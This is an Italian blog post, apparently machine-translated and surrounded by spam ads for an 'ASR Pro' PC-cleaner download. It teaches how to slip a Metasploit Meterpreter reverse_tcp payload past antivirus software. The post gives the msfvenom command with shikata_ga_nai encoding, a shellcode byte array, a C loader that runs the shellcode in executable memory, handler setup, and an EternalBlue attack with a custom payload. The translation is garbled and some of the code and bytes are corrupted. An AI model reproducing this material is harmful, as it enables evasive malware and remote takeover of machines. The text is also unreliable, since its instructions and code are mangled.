Blog

You are currently viewing Hai Problemi A Bypassare L’antivirus Meterpreter?

Hai Problemi A Bypassare L’antivirus Meterpreter?

Ecco alcuni semplici metodi che possono aiutarti a bypassare l’antivirus Meterpreter.

Aggiornato

  • 1. Scarica ASR Pro
  • 2. Esegui il programma
  • 3. Fai clic su "Scansiona ora" per trovare e rimuovere eventuali virus sul tuo computer
    • Accelera il tuo computer oggi con questo semplice download.

    g.Deviazione antivirus sui metodi Crea un nuovo payload o un codice shell diverso che generi una nuova firma che potrebbe davvero essere nel toolkit antivirus. Offuscamento (può essere annullato senza sforzo) e può crittografare il payload in fase di esecuzione, quindi molti lo decrittograferanno al volo, per non parlare di iniettarlo agganciato alla memoria.

    G.Antivirus

    L’evasione è una disciplina spesso sottovalutata che può aiutare o interrompere un’esplorazione di penetrazione. I moderni prodotti antivirus possono rilevare facilmente contatori e/o payload e possono indurre un pentester a sapere che è improbabile che il sistema venga compromesso.

    Per aumentare la nostra ricchezza di utilizzo globale basata sul tasso, creeremo un payload di indicatore di utilità reverse_tcp.

    TL; DR

    Verremo pagati abbastanza shellcode per msfvenom, lo codificheremo, inseriremo l’idea nel modello dell’etichetta di progettazione e forniremo la maggior parte del binario compilato, fornendo al contempo payload personalizzati utilizzando Metasploit.

    Codice shell di Windows: X86 o X64?

    meterpreter antivirus evasion

    Ancora qualche anno, i binari x64 si bloccavano spesso su Windows Defender, tuttavia, i prodotti AV sono migliorati molto una settimana fa e stanno iniziando a esplorare payloadsreter x64 meterp che sembrano abbiamo testato. Pochissimi codificatori programmano shellcode x64, riducendo ulteriormente la maggior parte dell’ambito relativo alla creazione di payload nascosti. Nei nostri test odierni, possiamo scoprire che la creazione di payload x86 utilizzando shikata_ga_nai ha superato la prova più duratura del tempo e ora può ancora bypassare tutti i motori AV.

    Misuratore di carico utile: lo è?

    Meterpreter viene rilevato dall’antivirus?

    È probabile che i moderni prodotti antivirus rilevino facilmente i payload del contatore e possono indurre uno scrittore a credere erroneamente che il sistema non sia certamente considerato vulnerabile.

    Puoi visualizzare uno spettacolo di payload eseguendo msfvenom -l payload . Quindi probabilmente utilizzeremo il payload supposto reverse_tpc: 

      windows / meterpreter o reverse_tcp Attualmente inietta la DLL del server Meterpreter tramite un payload Reflective Dll Injection (intermedio). Ristabilire la comunicazione considerando l'attaccante

    Nota. Il nostro payload windows / meterpreter / reverse_tcp scelto può essere leggermente diverso dal payload windows rispetto a meterpreter_reverse_tcp . Il secondo indica a e che il payload è pronto, si riconnette al nostro gestore, che fornirà il payload effettivo del meterpreter.

    Codificatore Shellcode

    Puoi visualizzare tutti i codificatori di accesso attivando msfvenom -l Encoder . La maggior parte delle volte ottengo buoni risultati con x86 - shikata_ga_nai con un numero che si riferisce alle versioni. 

      x86 / shikata_ga_nai eccellente codificatore di feedback additivo XOR polimorfico

    Genera codice wrapper con Msfvenom

    Ora sto per usare davvero msfvenom per esportare il payload reverse_tcp come shellcode codificato. Dovrai spostare l’indirizzo IP e la porta della maggior parte, incluso il tuo ascoltatore. Potresti anche essere interessato alla modifica del numero di versioni ( -i 10 ), l’utilizzo fino a 25 dovrebbe essere protetto nella maggior parte delle situazioni:

    Aggiornato

    Sei stanco della lentezza del tuo computer? Infastidito da messaggi di errore frustranti? ASR Pro è la soluzione per te! Il nostro strumento consigliato diagnosticherà e riparerà rapidamente i problemi di Windows, aumentando notevolmente le prestazioni del sistema. Quindi non aspettare oltre, scarica ASR Pro oggi!


      bucks msfvenom -p windows / meterpreter / reverse_tcp LHOST è uguale a 10.0.0.5 LPORT = 9090 -e x86 rispetto a shikata_ga_nai -i 8 -free pc> shell.c

    Nell’output di questa fantastica linea, il nostro team è interessato alla linea Dimensioni del payload: , e in questo esempio ora abbiamo 557 byte

    Il computer può rilevare il payload Metasploit?

    Potresti pensare che i rivenditori AV abbiano il vantaggio che devi a tutti i Metasploit open source, ma in questo caso, facilmente, non ci sono dubbi. In effetti, la formula logica è sì, poiché Metasploit è in gran parte open root, tutti i programmi antivirus dovrebbero rilevare e bloccare le missioni generate da Metasploit quando svolgono il proprio lavoro.

      [-] Piattaforma non selezionata, Msf :: Modulo :: Piattaforma :: Windows selezionato lontano dal carico utile [-] Arco non selezionato, Arco: x86 selezionato come carico utile 8 iterazioni basate su x86 riuscite - shikata_ga_naix86 / shikata_ga_nai size da 368 (iterazione uguale a 0) x86 / shikata_ga_nai misurazione riuscita grazie a 395 (iterazione = 1) x86 / shikata_ga_nai sizeohm efficiente con 422 (iterazione = 2) x86 e la dimensione shaiikata_ga_ga con 449 (iterazione = 3) x86 e shikata_ga_ga ha avuto successo con la dimensione 476 (l'iterazione equivale a 4) la dimensione x86 / shikata_ga_nai con successo è molto più di 503 (iterazione = 5) la dimensione x86 / shikata_ga_nai ha prevalso con 530 (iterazione = 6) x86 la dimensione shikata_ga_nai prevale da 557 (iterazione.) = 7) x86 contro shikata_ga_nai selezionato nella dimensione finale 557 Dimensione payload: 557 byte Dimensione finale file c: 2366 byte  

      unsigned char buf [] equivale a "xdbxddxd9x74x24xf4x5ax31xc9xbbx3bxe2xb0xc9xb1" "x85x31x5ax19x03x5ax19x83xeaxfcxd9x17x0dxc1xab" "x37x0ax09x07x1exa7x89x53xfbx61x1bx2ax82x40xf1" "x59xf8x61x01x62x94x74xe8x99x05x5bx51xe8x63xe4" "x2ax87xccxeaxfbx81x45x6bx9axbdx83x08x50xdex32" "x65x18x9cx35x5bx77x9ax64xeax8fxfax13x1fx28xe1" "xb9xfdxe2x22xbax07xd5xe0x74xeaxb8x9cx81x28x24" "x11x81x75x4cxcax2bx53x3fx7exa4x88xf8xaax76x43" "x4dxecx6dxcaxf9xd8x3fxf6x11xdex11xc3x16x02xa5" "x04x32x29x21xc9x4exdfxa8xcfxdcxd7x81x91xcex08" "x3bxf8x72xc1xcax3cx89xeexcdx89xabxa2xcfx82x5d" "xdfx24xc9xdbx19x83xa6x73xffxa9xe4xcex23x0exf2" « x5ax1bx49x6fx5cx32xa1x17xc6x6ax83xfbxb1x61x3c "" x63x1fx31xa8x1ex53x68x3axe0xe5x17xb6x02x37x3e "" xa2xbbxb0xe1xb8x54x73xf2x17xc6xadxe2x0dxb0x84 "" x56x54x82x23x79x1fx4exeex94x8fx3axe1x10x06x45 "" xf9xb9x8ax65xfdx02xc9x07xcexb4x61x92x74xdfx14 "" x47x19x51xe4x9dxd8xa8x13xbfx50x5bxf9x1ex2dx48 "" x8ex2fx12x43x44x1fx9axe1x53xffx0bx33xd8x66xbc "" xf2xfcxc9x51xbdx2ax19xe9xd5xbcx9ex5 FX7 2xcfx 8 "" x81x42x1cxd8x0ex8cxedx75xfe x7ax5dx72xffx81x09 "" xa4x1bx91x74x31x32xc5xd3x7bxd0xd3x58x2ax61xc0 "" xddx2axdcxe5x84x8dx75x99xf8x66xccx72xdcx55x98 "" x40xcfxc3xcfxdbx02x61x0cxd9xa4xf0x20xcfxdbx3f "" x1cx54x05x4dxe6xf1x3axd2x5bx0cx4bx52x6ex0cxfe "" xeex89x4ex4cx17x55xc7x42x3exfdx8axafxdfxe5x69 "" xc9x10x4  ; 8xc6xabx85x41x23x4axbexc4x85x27x5ex74 “” xa8xc3x9bx3fx24xccx4ex0fxe0x54x26x0ax95x12x97 “” x61x8dxa8x90x95x1dx40x29x0cx9axf8xcfx35x2fx64 “” x27xc4x75x2ex13x7ax12x7cx46x83xd6xcfx18x41x1e “” x03x74xb6xc7x90x7ex22x72xfcx59x67x84xb5xe6x3e “” x47xcdxbbxa2xabxa3xb4xfexc2x6fx38x49xf9xecx59 “” x81x15x7bx10xc0x3bx05xe1x5cxacx08x85x2fx3fx90 “” x29x2excdxaax4ex6fx9fx9cxe9x97x96x3fxb0xd4xc1 “” x64x22x20xe5xdcx5ax0fx7fx77x37xd1x51x77xa4x10 “” xedx58xd0xbbx62xa9x8fx30x8exa1x1dx0dx73x3dx3f “” xcbxf4xfex06x81xc6xf2x03xc7x22xf0xebx0ex61xe6 “” x5cxc5 “
    

     Crea un progetto di Visual Studio 
    

     Crea il tuo modello 
    

      #include  #include  unsigned char const payload [] significa ""; size_t quantità = 0; int main (int argc, char ** argv) char * codice; printf ("Questa è in effetti solo una stringa casuale! n"); Il codice è sicuramente (char *) VirtualAlloc (NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy (codice, carico utile, dimensione); ((codice non valido) (); sito di nuovo (0);  
    

     1: aggiungi il numero di cellulare “dimensione payload” della persona (non utilizzare “forma file finale c”) a partire dal momento in cui è stato prodotto il payload. In questo caso erano 557 byte: 
    

      

    1.  Sostituisci il segnaposto del payload [] con in genere il codice wrapper generato in buf []: 
      2. 

    

      

    1.  Aggiungi una serie di testi casuali davvero non abbiamo bisogno delle stesse firme! 
      2. 

    

      

    1.  Seleziona una versione dal menu a tendina della compilazione: 
      2. 

    

      

    1.  Premi Ctrl + B e il tuo utile nudo Il nodo ha davvero bisogno di essere creato! 
      2. 

    

    

     Nota. Se si verificano errori da vcruntime140.dll, il sistema potrebbe non avere effettivamente installato Visual dal runtime di Studio corrente; Puoi trovare tutto su un server minimamente assemblato. Per evitare ciò, puoi andare effettivamente alle proprietà del progetto e quindi modificare la libreria di riproduzione in  Multithreading (/ MT) . Crea anche un binario staticamente contiguo. Tuttavia, le cose diventano molto più binarie e più inclini in modo che rileverà solo AV. Usa questo solo come la migliore ultima risorsa! 
    

     Avvia Counter Interpreter Manager 
    

    meterpreter anti virus evasion
    

     Ora, in tutto il corpo dell’attacco, gli esperti creano un gestore in grado di accettare collegamenti in entrata dal nostro payload. Dobbiamo assolutamente fare in modo che l’indirizzo IP e la porta siano esattamente gli stessi utilizzati nei primi passaggi: 
    

      msf5> Exploit / Multi / Handler farebbe uso dell'exploit msf5 (Multi / Handler)> Installa PAYLOAD windows / meterpreter / reverse_tcpPAYLOAD => windows per ogni meterpreter / reverse_tcpmsf5 Exploit (Multi / Handler)> usa LHOST 10.0.0.5LHOST = > Exploit 10.0.0.5msf5 (multi o handler)> 9090LPORT lport pair => exploit 9090msf5 (multi handler)> gesture -j [*] exploit eseguitoEsegue tutto in background 0. [*] L'exploit è stato eseguito , ma la sessione non è stata ancora terminata. [*] Il backhandler TCP è iniziato alle 10.0.0. Inizio 5: 9090  
    

    

    

    Meterpreter è un malware?
    

    Cos’è Meterpreter? Meterpreter è un odioso Trojan che può aiutare gli aggressori a controllare in remoto i sistemi informatici infetti da virus. Questo malware viene eseguito nella tua memoria personale quando non scrivi nulla sul tuo incredibile disco rigido. Quindi, si inserisce in attività compromesse ed è lontano dal creare nuovi processi.
    

    

     Per un nuovo brillante payload umano come parte da fare con un nuovo exploit, possiamo usare il tuo attuale payload  generico/personalizzato  e persino identifica il tuo nome file binario: 
    

      msf5> utilizza l'exploit windows / smb / ms17_010_eternalbluemsf5 (windows e smb / ms17_010_eternalblue)> payload generico e custompayload => exploit generico / custommsf5 (windows per smb / ms17_010_eternalblue1. / home1 .exemsf5 / smb ms17_010_eternalblue)> define RHOSTS 10.0.0.30RHOSTS => 10.0.0.30msf5 Exploit (windows / smb / ms17_010_eternalblue)> Exploit>  
    
 Accelera il tuo computer oggi con questo semplice download. 

    

    

    


    Related posts:
    

    

Hai Problemi Con La Risoluzione Dei Problemi Del Tuo Congelatore?

Default ThumbnailHai Problemi Specifici Con L’antivirus Completamente Gratuito Olhar Digital Melhor 2012?

Hai Problemi Con La Schermata Blu Profonda Con Dell Ati2dvag?

Hai Problemi Con Il Checksum Del Tuo File Solaris?